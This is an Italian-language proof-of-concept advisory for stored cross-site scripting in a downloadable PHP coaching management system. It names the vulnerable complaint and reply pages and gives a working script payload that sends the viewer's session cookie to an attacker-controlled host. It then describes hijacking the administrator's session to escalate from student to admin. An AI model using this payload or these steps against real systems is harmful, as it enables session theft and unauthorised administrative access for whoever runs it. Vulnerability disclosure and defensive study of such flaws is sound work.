
Exploit proof-of-concept per XSS persistente (CWE-79) in un sistema di gestione del coaching in PHP, che dimostra il dirottamento della sessione e l'escalation dei privilegi da studente ad amministratore tramite furto di cookie.
Coaching Management System in PHP (Code-Projects.org) https://code-projects.org/coaching-management-system-in-php-with-source-code/
Sconosciuta (Nessuna informazione sulla versione fornita dal venditore; testata sull'ultima versione disponibile da Code-Projects.org ad aprile 2026)
CWE-79: Neutralizzazione impropria dell'input durante la generazione di pagine web (Cross-Site Scripting persistente)
L'applicazione non riesce a sanitizzare correttamente l'input fornito dall'utente nella funzionalità di reclamo e risposta. JavaScript dannoso iniettato da un utente con privilegi bassi viene memorizzato ed eseguito quando visualizzato da utenti con privilegi più elevati, come amministratori o docenti.
Inoltre, anche la funzionalità di risposta è vulnerabile, consentendo ad amministratori o docenti di iniettare JavaScript che viene eseguito nelle sessioni degli studenti.
Ciò comporta una vulnerabilità di Cross-Site Scripting persistente che interessa più ruoli utente.
Accedi come Studente
Vai a:
/modules/student/complaint.php

Invia un reclamo con il seguente payload:
<script>
new Image().src="http://ATTACKER-IP:PORT/?c="+document.cookie;
</script>
Accedi come Amministratore
Vai a:
/modules/admin/incomingcomplaint.php

Quando l'amministratore visualizza il reclamo, il payload viene eseguito automaticamente
Il cookie di sessione dell'amministratore viene inviato al server controllato dall'attaccante
Utilizza il cookie di sessione rubato per dirottare la sessione dell'amministratore

Gravità: CRITICAL